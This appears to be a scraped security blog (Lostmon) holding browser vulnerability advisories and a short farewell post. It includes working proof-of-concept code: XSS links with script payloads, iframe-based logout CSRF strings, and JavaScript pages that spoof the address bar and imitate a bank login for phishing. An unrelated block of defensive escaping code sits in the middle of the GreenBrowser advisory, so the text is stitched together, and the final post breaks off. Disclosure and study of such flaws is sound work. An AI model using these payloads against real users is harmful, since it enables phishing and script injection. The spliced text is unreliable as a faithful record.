Lostmon Blogger: Security Research &amp; Analysis<br>
Personal blog where I publish my investigations,<br>
advisories and some outstanding news on security.<br>
<p>That is All (2023-05-09)</p><p>Lostmon disappeared a few years ago. My way of working and the excessive hours in front of a computer, coupled with high levels of stress and family problems, have led me to a situation where I feel trapped and unable to escape.</p><p>Everyone must fight their own inner demons when they come to visit.</p><p>Reality is just a point of view, and even when we see reality with our own eyes, it can vary and differ from another observer's perspective.</p><p>This has led me to suffer from a mental illness called bipolar schizoaffective disorder.</p><p>Dealing with my enemy is not easy, and I do not want to feed my demons, but computing, PCs, hardware and software, as well as bugs and other technological worlds, have become a mere anecdote in this daily struggle.</p><p>Thank you to all who supported me and believed in me one day.</p><p>Good luck, peace and harmony to all!</p><p>Curiosity is what makes the mind move...</p><div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....</div>
<p>Opera, Chrome, Firefox, Edge browsers DeadSystemException deeplinks and share links Crash DoS (2022-11-14)</p><p>Waiting to disclose details.</p><p>https://bugs.chromium.org/p/chromium/issues/detail?id=1385502</p><p>https://github.com/mozilla-mobile/focus-android/issues/8056</p><p>Related vuln:</p><p>http://lostmon.blogspot.com/2022/10/mozilla-firefox-focus-and-nightly.html</p>
<p>Mozilla Firefox, Focus and Nightly for Android remote crash DoS (2022-10-12, last updated 2022-11-25)</p>
<p>########################</p>
<p>Mozilla Firefox, Focus and Nightly</p>
<p>for Android Remote Crash DoS</p>
<p>Vulnerability.</p>
<p>Last update: 25/11/2022</p>
<p>########################</p>
<p>################</p><p>Description</p><p>################</p>
<p>A vulnerability is present in the way that Mozilla's Android products manage the clipboard and handle exceptions.</p>
<p>A malicious site can take advantage of software exceptions to crash the app, or to deny access to the clipboard and cause a crash, resulting in the loss of information that was not saved.</p>
<p>If we close the app and clear the cache etc., we have the same situation: a crash, or a DoS that leads to a crash. :)</p>
<p>The vulnerability interacts with parts of the Android system such as "open links in app" and the sharing functions.</p>
<p>It is a set of different error messages that the app cannot handle: the programmer stores remote data in parcels, or stores data in the clipboard and processes it.</p>
<p>Multiple apps are vulnerable to this style of attack, resulting in loss of data, DoS of the application, an application crash, DoS of functions, or a dead browser thread/activity that forces the user to close the app.</p>
<p>We can abuse parcel errors in:</p><p>TransactionTooLargeException</p><p>DeadSystemException</p>
<p>We can abuse "open in app", sharing functions or clipboard functions in:</p>
<p>TransactionTooLargeException</p><p>DeadSystemException</p><p>ClipboardManager</p><p>content.ClipboardManager.getPrimaryClip</p>
<p>################</p><p>Versions affected:</p><p>################</p>
<p>Mozilla Firefox</p><p>107.1.0 Build #2015915067</p><p>106.1.0 built 2015907747</p><p>105.2.0 built 2015907747</p>
<p>Mozilla Nightly</p><p>107.0a1</p><p>built 2015909163</p><p>built 2015909131</p><p>built 2015915115</p><p>108.0a1</p><p>built 2015912339</p><p>built 2015913675</p><p>109.0a1</p><p>Build 2015916075</p><p>Build 2015917035</p><p>Build 2015917803</p>
<p>Mozilla Focus</p><p>105.0.2</p><p>built 362762015</p><p>107.1.0</p><p>Built 363142253</p>
<p>#########################</p><p>Related bugs in other apps</p><p>https://bugs.chromium.org/p/chromium/issues/detail?id=1385502</p>
<p>Mozilla issue tracker</p><p>https://github.com/mozilla-mobile/focus-android/issues/8056</p><p>Possible related bug</p><p>https://github.com/mozilla-mobile/android-components/issues/12804</p><p>Tested on</p><p>Android 9, 10, 11, 12; testing continues</p>
<p>################</p><p>Timeline</p><p>################</p><p>Discovered 28-08-2022</p><p>Vendor notified: NO</p><p>Released 12-10-2022</p><p>Last update 25-11-2022</p><p>###############</p><p>No more details at this time.</p><p>Exploit available in private.</p><p>I will update this advisory in a few days with more information.</p>
<p>################ €nd ####################<br /><br />--<br />Sincerely:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />Curiosity is what makes the mind move....</p>
<p>Safari for Windows 5.1.7 (7534.57.2) Remote code execution (2013-12-14)</p>
############################################<br />
Safari for Windows 5.1.7 (7534.57.2) Remote code execution<br />
JavaScriptCore.dll (7534.57.3.3)<br />
Vendor notified: NO. Exploit available: Private<br />
Advisory: http://lostmon.blogspot.com.es/2013/12/safari-for-windows-517-7534572-remote.html<br />
#############################################<br />
<br />
Safari for Windows is a discontinued product, but in my work
(technical support for clients and businesses) I found it installed on several
machines.<br />
<br />
It is vulnerable to a buffer overflow in JavaScriptCore.dll that allows a remote crash if exploitation fails,
or remote code execution if the exploit succeeds.<br />
<br />
This issue is triggered when Safari tries to allocate a large amount of data in JavaScript stack memory.<br />
We expect an "out of memory" alert box, but this alert can be bypassed or fuzzed, resulting in RCE.<br />
<br />
I don't like the responses from Apple, and this is a discontinued product....
See the WinDbg log for this issue:<br />
<br />
<pre>(1240.1334): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000000 ecx=77d25085 edx=00000000 esi=1d7c0000 edi=7ff90240
eip=61b39357 esp=0023f01c ebp=00000001 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Safari\Apple Application Support\JavaScriptCore.dll -
JavaScriptCore!WTF::fastMalloc+0x157:
61b39357 c705efbeadbb00000000 mov dword ptr ds:[0BBADBEEFh],0 ds:0023:bbadbeef=????????
0:000> !load msec.dll
0:000> !exploitable -m
VERSION:1.6.0.0
IDENTITY:HostMachine\HostUser
PROCESSOR:X86
CLASS:USER
QUALIFIER:USER_PROCESS
EVENT:DEBUG_EVENT_EXCEPTION
EXCEPTION_FAULTING_ADDRESS:0xffffffffbbadbeef
EXCEPTION_CODE:0xC0000005
EXCEPTION_LEVEL:SECOND_CHANCE
EXCEPTION_TYPE:STATUS_ACCESS_VIOLATION
EXCEPTION_SUBTYPE:WRITE
FAULTING_INSTRUCTION:61b39357 mov dword ptr ds:[0bbadbeefh],0
MAJOR_HASH:0x7fdedd27
MINOR_HASH:0x39b7b969
STACK_DEPTH:6
STACK_FRAME:JavaScriptCore!WTF::fastMalloc+0x157
STACK_FRAME:WebKit!WKDictionaryGetTypeID+0xb112
STACK_FRAME:WebKit!WKCredentialGetTypeID+0x1f776
STACK_FRAME:WebKit!WKCredentialGetTypeID+0x489f2
STACK_FRAME:WebKit!WKCredentialGetTypeID+0x4337e
STACK_FRAME:JavaScriptCore!JSC::JSArray::getOwnPropertySlotByIndex+0x2a44
INSTRUCTION_ADDRESS:0x0000000061b39357
INVOKING_STACK_FRAME:0
DESCRIPTION:User Mode Write AV
SHORT_DESCRIPTION:WriteAV
CLASSIFICATION:EXPLOITABLE
BUG_TITLE:Exploitable - User Mode Write AV starting at JavaScriptCore!WTF::fastMalloc+0x0000000000000157 (Hash=0x7fdedd27.0x39b7b969)
EXPLANATION:User mode write access violations that are not near NULL are exploitable.
0:000> !exploitable
!exploitable 1.6.0.0
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at JavaScriptCore!WTF::fastMalloc+0x0000000000000157 (Hash=0x7fdedd27.0x39b7b969)
User mode write access violations that are not near NULL are exploitable.
</pre>
####################### €nd ########################## <br />
--<br />
Sincerely:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
Curiosity is what makes the mind move....
<p>Opera browser Speed Dial Extensions XSS and CSRF (2013-08-27)</p>
########################################<br />
Opera Browser Speed Dial Extensions XSS and XSRF<br />
Original advisory: http://lostmon.blogspot.com.es/2013/08/opera-browser-speed-dial-extensions-xss.html <br />
########################################<br />
<br />
############<br />
Description:<br />
############<br />
<br />
Speed Dial gives you quick access to your favorite Web sites. Every time you open a new tab, you are presented with a 3x3 grid of thumbnails, each representing a Web address. To open a page, click on the corresponding thumbnail, or use the keyboard shortcuts. http://help.opera.com/Mac/10.50/en/speeddial.html<br />
<br />
#########<br />
Abstract<br />
#########<br />
<br />
Developers build extensions for fast access to web services like<br />
Gmail, Flickr or Facebook.<br />
<br />
Speed Dial "protects users" from direct XSS attacks, but the extensions used in Speed Dial are not free of bugs and some of them are not safe. A remote attacker could compose special attacks to abuse the functionality of these extensions in Speed Dial.<br />
<br />
<br />
####################<br />
Extensions for Gmail<br />
####################<br />
<br />
These two extensions show the latest unread emails from Gmail and are vulnerable to XSS &amp; CSRF style attacks.<br />
<br />
######<br />
XSS:<br />
######<br />
<br />
If an attacker writes an email and inserts HTML code in the subject, it is executed in the extension.<br />
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbWL0lAMgS1MQsI-M8IuSRY5YKVZQraWI61hdUxQmhUoHmjo9ho55KZ6KKKftHop5Ree8xkSosFMYYXyaeEq4yX-gPRdMpFMVlr6RdDoh4loA8z1nLc6BZSxm3EUgHyKGFEzi0/s1600/svg.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbWL0lAMgS1MQsI-M8IuSRY5YKVZQraWI61hdUxQmhUoHmjo9ho55KZ6KKKftHop5Ree8xkSosFMYYXyaeEq4yX-gPRdMpFMVlr6RdDoh4loA8z1nLc6BZSxm3EUgHyKGFEzi0/s400/svg.png" width="400" /></a><br />
<br />
######<br />
XSRF:<br />
######<br />
<br />
If an attacker composes an email with a subject like <br />
"><iframe src="https://mail.google.com/mail/?logout&hl=es"<>/iframe><br />
then, when the extension refreshes its content, it calls the logout function for the victim.<br />
<br />
<br />
https://addons.opera.com/es/extensions/details/gmail-on-speed-dial-ex/<br />
https://addons.opera.com/es/extensions/details/gmail-on-speed-dial/<br />
<br />
##############################<br />
Extensions for Google Calendar<br />
##############################<br />
<br />
These two extensions show reminders and events from Google Calendar<br />
and are vulnerable to XSS &amp; CSRF style attacks.<br />
<br />
######<br />
XSS:<br />
######<br />
<br />
If an attacker writes an event in a shared calendar and inserts HTML code in the subject, it is executed in the extension.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBoxZow78isVr3AohNi6HZeeBRNHKt_tYN0QsDGngNyDddeb-HGAtaPemzHZYFSDqHZUlIOA9irto4QLed2fFEv2icqfVtgyKTewE-c08EzavjHU-P9p9XxeUKju-woQOOXA5J/s1600/iframe.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBoxZow78isVr3AohNi6HZeeBRNHKt_tYN0QsDGngNyDddeb-HGAtaPemzHZYFSDqHZUlIOA9irto4QLed2fFEv2icqfVtgyKTewE-c08EzavjHU-P9p9XxeUKju-woQOOXA5J/s400/iframe.png" width="400" /></a><br />
<br />
######<br />
XSRF:<br />
######<br />
<br />
If an attacker creates an event in a shared calendar with a subject like <br />
"><iframe src="https://www.google.com/calendar/logout"<>/iframe><br />
then, when the extension refreshes its content, it calls the logout function for the victim.<br />
<br />
<br />
https://addons.opera.com/es/extensions/details/google-calendar/<br />
https://addons.opera.com/es/extensions/details/gcaltoday/<br />
<br />
################<br />
Related Links<br />
################<br />
<br />
http://lostmon.blogspot.com.es/2010/09/google-chrome-instaled-extensions.html<br />
http://www.osvdb.org/search?search[vuln_title]=lostmon%20extension&search[text_type]=alltext<br />
http://www.oxdef.info/posts/2011/01/18/chrome-ext/<br />
http://www.pcmag.com/article2/0,2817,2359778,00.asp<br />
<br />
<br />
############## End ########################<br />
<br />
##################<br />
Solution<br />
###################<br />
<br />
No solution was available at this time !!!<br />
<br />
################ €nd ####################<br />
<br />
-- <br />
Sincerely:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
Curiosity is what makes the mind move....
<p>Arora qrc: dialog XSS and DoS (2012-07-31)</p>
########################################<br />
Arora qrc: dialog XSS and DoS<br />
Vendor URL: http://code.google.com/p/arora/<br />
Advisory: http://lostmon.blogspot.com.es/2012/07/arora-qrc-dialog-xss-and-dos.html<br />
Vendor notified: NO. Exploit available: yes<br />
#######################################<br />
<br />
Arora is a lightweight cross-platform web browser. It's free (as in free speech and free beer). <br />
Arora runs on Linux, embedded Linux, FreeBSD, Mac OS X, Windows, Haiku, and any other platforms <br />
supported by the Qt toolkit.<br />
<br />
Arora uses the QtWebKit port of the fully standards-compliant WebKit layout engine. <br />
It features fast rendering and a powerful JavaScript engine, and supports Netscape plugins. <br />
<br />
Arora contains two flaws that allow a remote cross-site scripting (XSS) attack and a DoS. <br />
<br />
The XSS exists because the application does not validate the qrc: URI dialog and <br />
internal error pages. This may allow a user to create a specially crafted link/URL that <br />
would execute arbitrary script code in a user's browser within the trust relationship<br />
between their browser and the (local) qrc handler.<br />
<br />
Arora also has a second flaw that allows a denial of service or an app crash via a special link.<br />
<br />
<br />
#################<br />
Proof of Concept<br />
#################<br />
<br />
Create an HTML document with this code and click the link: it executes <br />
the XSS and, if you accept the alert box, the app crashes :)<br />
<html><body><br />
<a href='qrc:/"><script>alert('Sorry, Now Your App Crash!');</script>'>Arora about: handler XSS</a><br />
</body></html><br />
<br />
################<br />
Versions affected<br />
################<br />
<br />
<span class="h3">Arora 0.10.0 Windows Qt 4.5.3</span><br />
<br />
##################<br />
Solution<br />
###################<br />
<br />
No solution was available at this time !!!<br />
<br />
################ €nd ####################<br />
<br />
-- <br />
Sincerely:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
Curiosity is what makes the mind move....
<p>Firefox 11 DoS using exponential string growth and document.write() (2012-04-22)</p>
#############################################<br />
Firefox 11 DoS using exponential string growth and document.write()<br />
Vendor URL: http://www.mozilla.org<br />
Advisory: http://lostmon.blogspot.com.es/2012/04/firefox-11-dos-using-exponential-string.html<br />
Vendor Bugzilla: https://bugzilla.mozilla.org/show_bug.cgi?id=744637<br />
Vendor Notify: YES <br />
##############################################<br />
<br />
Mozilla Firefox for Windows is vulnerable to a denial of service condition. The crash is triggered when loading a malformed page with a malicious script that fills up the memory.<br />
<br />
####################<br />
Versions affected<br />
####################<br />
<br />
Mozilla Firefox 11.0<br />
<br />
##############<br />
Solution<br />
###############<br />
<br />
No solution was available at this time!!<br />
<br />
#############<br />
Proof Of Concept<br />
##############<br />
<br />
see https://bugzilla.mozilla.org/show_bug.cgi?id=744637<br />
<br />
<br />
################ €nd ######################<br />
<br />
-- <br />
Sincerely:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
Curiosity is what makes the mind move....<br />
<br />
<p>GreenBrowser About: dialog XSS and stored XSS (2012-03-27)</p>
########################################<br />
GreenBrowser About: dialog XSS and stored XSS<br />
Vendor URL:http://www.morequick.com/<br />
Advisory: http://lostmon.blogspot.com/2012/03/greenbrowser-about-dialog-xss-and.html<br />
Vendor notified: NO. Exploit available: yes<br />
#######################################<br />
<br />
GreenBrowser is your best choice of flexible and powerful green web browser.
GreenBrowser is free to download and use.<br />
<br />
GreenBrowser contains two flaws that allow a remote cross-site scripting (XSS) attack.
The first flaw exists because the application does not validate the about: URI dialog and the last visited
pages. This may allow a user to create a specially crafted URL that would execute arbitrary
script code in a user's browser within the trust relationship between their browser
and the server.<br />
<br />
Also, the browser saves the last URL visited, so if a user creates a crafted link
and clicks on it, it becomes a stored XSS: when the browser is opened, by default it loads
http://www.5igb.com/StartEn.htm, which lists the last visited URL. The XSS is executed
in this page :) and the browser does not validate LastVisitWriteEn() before rendering it to the user.<br />
<br />
You can see this function here => http://www.5igb.com/function.js<br />
<br />
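The Speed Dial extension bugs in the Opera advisory above and this GreenBrowser start-page bug share one root cause: an untrusted string (an e-mail subject, a calendar event title, the last visited URL) is written into the page as HTML. The following JavaScript is an added example, not code from any of these products or from this advisory, and shows the rendering an extension or start page should do instead: escape every untrusted string as text, and only let http/https URLs into an href. The names escapeHtml, safeHref, renderMessageRow, renderLastVisited, hasOnlyWrapperTags and SAMPLES are my own, and the sample inputs are constructed to mirror the payload shapes quoted in the advisories.

```javascript
// Added example (not from the advisory): safe rendering of untrusted strings
// such as e-mail subjects, calendar titles and "last visited" URLs, so that
// attacker-supplied markup is shown as text instead of being parsed as HTML.

const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};

// Escape the five characters that can break out of text or attribute context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Accept only absolute http(s) URLs for an href. Anything else
// (about:, javascript:, data:, unparseable input) becomes about:blank,
// so a crafted "last visited" entry can never reach the about: handler.
function safeHref(value) {
  try {
    const url = new URL(String(value));
    if (url.protocol === 'http:' || url.protocol === 'https:') {
      return escapeHtml(url.href);
    }
  } catch (err) {
    // not a parseable URL: fall through to the placeholder
  }
  return 'about:blank';
}

// A Speed-Dial style list row: the subject is escaped, never interpolated raw.
function renderMessageRow(subject) {
  return `<li class="mail">${escapeHtml(subject)}</li>`;
}

// A "last visited" link as a start page should build it:
// validated href, escaped link text.
function renderLastVisited(lastUrl) {
  return `<a href="${safeHref(lastUrl)}">${escapeHtml(lastUrl)}</a>`;
}

// True when the rendered fragment contains no tag other than the wrapper we
// emitted ourselves; a cheap self-check that no payload survived as markup.
function hasOnlyWrapperTags(html, wrapper) {
  const tags = html.match(/<\/?[a-zA-Z][^>]*>/g) || [];
  return tags.every((t) => t.replace(/^<\/?/, '').split(/[\s>]/)[0] === wrapper);
}

// Constructed sample inputs (hypothetical) mirroring the payload shapes
// described in the advisories.
const SAMPLES = {
  subject: '"><iframe src="https://mail.google.com/mail/?logout&hl=es"></iframe>',
  lastUrl: 'about:"><script>alert(1)</script>',
  benignUrl: 'http://www.5igb.com/StartEn.htm',
};

// Render both samples and report whether the output is markup-free.
function demo() {
  const row = renderMessageRow(SAMPLES.subject);
  const link = renderLastVisited(SAMPLES.lastUrl);
  console.log(row);
  console.log(link);
  return {
    row,
    link,
    rowSafe: hasOnlyWrapperTags(row, 'li'),
    linkSafe: hasOnlyWrapperTags(link, 'a'),
  };
}

demo();
```

The design point is that escaping is applied at the sink (the moment a string is turned into HTML), not at the source: an extension cannot control what Gmail or Google Calendar returns, and a start page cannot control which URL the user last visited, so the only reliable place to neutralise the content is the rendering code.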
#################<br />
Proof of Concept<br />
#################<br />
<br />
Create an HTML document with this code and click the link: it executes the XSS.
Close the browser and open it again; in the last visited pages we have the URL of the PoC
and it executes the stored XSS.<br />
<br />
<html><body><br />
<a href='about:"><script>alert(1)</script>'>GreenBrowser about: handler XSS</a><br />
</body></html><br />
<br />
################<br />
Versions affected<br />
################<br />
<br />
6.1.0117 (2012-01-17 10:22:02)<br />
6.1.0216 (2012-02-16 21:37:10)<br />
<br />
##################<br />
Solution<br />
###################<br />
<br />
No solution was available at this time !!!<br />
<br />
################ €nd ####################<br />
<br />
<pre>--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....
</pre>
<p>Safari for Windows 5.1.5 and prior and iOS URL spoof window.open() test case (2012-03-27)</p>
###########################################<br />
Safari for Windows 5.1.5 and prior URL window.open() spoof<br />
Vendor URL: http://www.apple.com<br />
Advisory: <a href="http://lostmon.blogspot.com/2012/03/safari-for-windows-515-and-prior-and.html">http://lostmon.blogspot.com/2012/03/safari-for-windows-515-and-prior-and.html</a><br />
Vendor notified: YES. Exploit available: YES<br />
##########################################<br />
<br />
##############<br />
History:<br />
##############<br />
<br />
Safari has serious issues with protocol handlers; over a long time I have reported
four or five vulnerabilities in different protocol handlers.
I reported a telnet issue in Safari for Windows, <strike>which Apple patched in silence.</strike><br />
<br />
Today I downloaded and tested Safari for Windows 5.1.5 only to check whether the vulnerability I reported in 03/2012 is patched..
see => http://lostmon.blogspot.com/2012/03/safari-for-windows-and-ios-url-weakness.html
Safari for Windows 5.1.5 has the same vulnerability ummm....<br />
<br />
############<br />
Description<br />
############<br />
<br />
Safari set the bar higher for web browsers. It introduced
sophisticated design elements that made browsing a joy.
Easy to use, Safari stayed out of your way and let you
effortlessly navigate from site to site.
Safari for Windows ignores which protocol handler we use; it doesn't
check whether the protocol is registered, or simply doesn't check any handler...
In the case I'm talking about, a pseudo URL spoof is possible. Let's
see some examples to understand the nature of this vulnerability.<br />
<br />
Case: the "about:" protocol handler.
Type "about:blank" in the address bar and it shows the about:blank page;
this is what we expect and this template is OK.
Type "about:something" in the address bar and the title and URL show the same (about:something).
Type "about:http://www.bankofamerica.com" and the title shows the same...<br />
<br />
Now the best thing is to write a title that simulates the title of the original page and
write some content in this window (about:http://www.bankofamerica.com):
the URL bar shows it, but in reality we are in an about:blank page...<br />
<br />
############<br />
PoC's<br />
############<br />
<br />
Create a function to open a new window and write location...<br />
<br />
var wx;
function invokePoC() {
wx = open("about:http://www.bankofamerica.com/login","newwin");
setInterval("doit()",1);
}<br />
<br />
And create a function to write in the result window.<br />
<br />
function doit() {
wx.document.open();
wx.document.write("<title>spoof title</title><body><h1><b>Hello !! i'm a Spoofed Site !!!</b></h1></body>");
}<br />
<br />
With this, a remote attacker can carry out spoofing or phishing attacks; but if we consider that Safari has issues in handlers,
the best attack is to drop the about: protocol handler and simulate bankofamerica, for example:
we can concatenate "www" as a handler and concatenate the http: handler to get a nice URL :)<br />
<br />
##########################<br />
Safari for windows URL Spoof<br />
##########################<br />
<br />
This PoC simulates the Bank of America URL and content.
The image is embedded via the data: scheme.<br />
<br />
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><br />
<html><br />
<head><br />
<title>Safari for windows 5.1.5 and prior URL spoof window.open() test case.</title><br />
<script type="text/javascript"><br />
var wx;<br />
function invokePoC() {<br />
wx = open("http://www:bankofamerica.com/login","newwin");<br />
setInterval("doit()",1);<br />
}<br />
function doit() {<br />
wx.document.open();<br />
wx.document.write("<title>Bank of America | Home | Personal</title><body><img src='data:image/gif;base64,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'/><h1><b>Hello !! i'm a Spoofed Site !!!</b></h1></body>");<br />
}<br />
</script><br />
</head><br />
<body onload="invokePoC()"><br />
<h1>Safari for windows 5.1.5 and prior URL pseudo-spoof window.open() test case.</h1><br />
<noscript><p>This test case requires JavaScript to run.</p></noscript><br />
<p>First click this link ==> <a href="http://www.bankofamerica.com/login" onClick="location.reload();" target="_blank">invoke PoC</a></p><br />
<p>Then look at the result window: the address bar<br />
shows the URL, and if you type any URL in the address bar, the browser can't navigate to it. This issue can be<br />
used to spoof sites or for phishing attacks. Vulnerable: Safari for Windows 5.1.5 and<br />
prior versions; Safari for iOS is also vulnerable.</p><br />
</body><br />
</html><br />
####################### €Nd ######################<br />
<br />
--<br />
Sincerely:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
Curiosity is what makes the mind move....
<p>Safari for Windows and iOS URL weakness (2012-03-23)</p>
<pre>#####################################
Safari for Windows and iOS URL Spoof
Vendor URL: http://www.apple.com
Advisory: http://lostmon.blogspot.com/2012/03/safari-for-windows-and-ios-url-weakness.html
Vendor notified: YES. PoC available: YES
#####################################
#############
History
#############
Yesterday I read news about a Safari for iOS
URL spoof vulnerability at http://iclarified.com/entry/comments.php?enid=20858
I want to clarify that I reported this vulnerability on 12/03/2011 to Apple
Product Security via MSVR. (I have the mails that demonstrate it.)
So Apple didn't patch it and this vuln is one year old.
I also reported an automatic telnet execution in Safari for Windows...
and <strike>they patched it in silence</strike> ... no credits, no info...
This is the response about the telnet execution from Apple:
" Issue 1: We do not see any security implications with allowing telnet connections.
There is an existing enhancement request for OS X to provide a warning dialog."
Yes, but not in Windows, and if you make apps for Windows you can't say it does not work in OS X. It works in Safari for Windows prior to 5.1.4
Issue 2: URL Spoof
A while ago I found an RCE in IE 6, 7 and 8, see MS011-57;
it also affects the QtWeb browser and Safari for Windows.
I reported it to Apple, sat quiet and waited until Apple patched.
So what happened? A year after the report the vuln continues working and other
researchers have published it ( http://majorsecurity.net )
but I would like to clarify that I reported it to Apple one year ago !!!
Response from Apple:
"Issue 2: The outside third party you are coordinating with already sent this issue to us on January 10, 2011. It does not appear possible to spoof arbitrary URLs in the address bar (i.e. while the title may say "Bank of America" in the proof-of-concept, you can't spoof the address bar to read https://bankofamerica.com) Given that the most serious impact of this issue is that you can prevent the user from using the address bar in the newly created tab, we do not have a timetable to resolve this issue."
Look at his PoC / exploit and look at my PoC code
His code => http://majorsecurity.net/html5/ios51-demo.html
My code => http://lostmon.blogspot.com/2011/10/qtweb-internet-browser-url-weakness.html
This is similar to the code that I reported to Apple.
Bad words for Apple on security !!!!!!!!!!! and bad work with security researchers :/
################
Sample codes
################
############ BOF Safari.html #################
<html><title>Safari unauth telnet execution by lostmon</title>
<script type="text/javascript" language="javascript">
function redirect() {
location.replace("telnet:192.168.1.1");
}
</script>
<body onLoad="redirect();">
</body>
</html>
############### EOF ################
2- URL Spoof or about:blank spoof
This issue can be used to spoof URL locations or to show fake content
without any URL in the address bar.
- Open the PoC and click "invoke PoC", then look at the address bar: it
does not show any URL.... (safari2.html)
- Open the PoC and click "invoke PoC" (safari3.html) and look at the address bar:
it shows "about:blank" but the page isn't at about:blank.
Also look at the page title :) This can be used to spoof content.
############## BOF safari2.html #################
<html>
<head>
<title>About:blank Url spoofing using document.open() testcase</title>
<script type="text/javascript"><!--
var wx;
// Open a named window with an empty URL, then keep rewriting its document
function invokePoC() {
wx = open("","newwin");
setInterval("doit()",1);
}
// Each call replaces the new window's document while the address bar stays empty
function doit() {
wx.document.open();
wx.document.write('OWNED OWNED OWNED');
}
// -->
</script>
</head>
<body>
<h1>About:blank Url spoofing using document.open() testcase</h1>
<noscript><p>this testcase requires JavaScript to run.</p></noscript>
<p><a href="javascript:invokePoC();">invoke PoC</a></p>
</body>
</html>
################# EOF ################################
#################### BOF safari3.html ###################
<html>
<head>
<title>About:blank Url spoofing using document.open() testcase</title>
<script type="text/javascript"><!--
var wx;
// Open a named window at about:blank, then keep rewriting its document
function invokePoC() {
wx = open("about:blank","newwin");
setInterval("doit()",1);
}
// The title written here is what the window shows while the address bar still reads about:blank
function doit() {
wx.document.open();
wx.document.write('<html><title>Bank Of America</title>OWNED OWNED OWNED<br></html>');
}
// -->
</script>
</head>
<body>
<h1>About:blank Url spoofing using document.open() testcase</h1>
<noscript><p>this testcase requires JavaScript to run.</p></noscript>
<p><a href="javascript:invokePoC();">invoke PoC</a></p>
</body>
</html>
##################### EOF ##############################
I would like to thank MSVR for their concern about this issue and for talking about it with Apple. MSVR is a very good program and they do A VERY GOOD WORK on security!!!!!
--
Regards:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what moves the mind....
</pre>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-54194734087003927472011-10-03T03:55:00.001-07:002011-10-03T03:57:09.093-07:00QTWeb Internet Browser URL weakness lets remote attackers perform spoofing or phishing attacks#################################################<br />
QTWeb Internet Browser URL weakness lets remote attackers perform spoofing or phishing attacks<br />
Vendor URL: http://www.qtweb.net/<br />
Vendor bugtrack=> http://code.google.com/p/qtweb/issues/detail?id=151<br />
Advisory: http://lostmon.blogspot.com/2011/10/qtweb-internet-browser-url-weakness.html<br />
Vendor notify: YES exploit available: YES<br />
##################################################<br />
<br />
###################<br />
Description By vendor<br />
###################<br />
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
QtWeb Internet Browser - lightweight, secure and portable browser having unique user interface and privacy features. QtWeb is an open source project based on Nokia's Qt framework and Apple's WebKit rendering engine (the same as being used in Apple Safari and Google Chrome).</div>
<br />
######################<br />
Vulnerability Description<br />
######################<br />
<br />
<div style="text-align: left;">
Normally, when you navigate to a site the browser shows the real URL, but QtWeb has a weakness that lets an attacker show an empty URL. This weakness can be used for phishing or spoof attacks: you may think you are at Bank of America, for example, while the browser shows nothing in the address bar :) </div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzJn5s8fe9D715KjGQuOrrEdEPsjapG2JR8PHbKSZf4Ihu-_tJ4OSZC5-xJpMNIvbqHABPlSjUi-zB0qcAo_IFI7iuswYqtJVliyAcdm8rbo7FxIYBoMYlN-FDWnuEenMIxfCN/s1600/qt1.jpg" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzJn5s8fe9D715KjGQuOrrEdEPsjapG2JR8PHbKSZf4Ihu-_tJ4OSZC5-xJpMNIvbqHABPlSjUi-zB0qcAo_IFI7iuswYqtJVliyAcdm8rbo7FxIYBoMYlN-FDWnuEenMIxfCN/s400/qt1.jpg" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b><span style="color: black;">Without any URL</span></b></td></tr>
</tbody></table>
<div style="text-align: justify;">
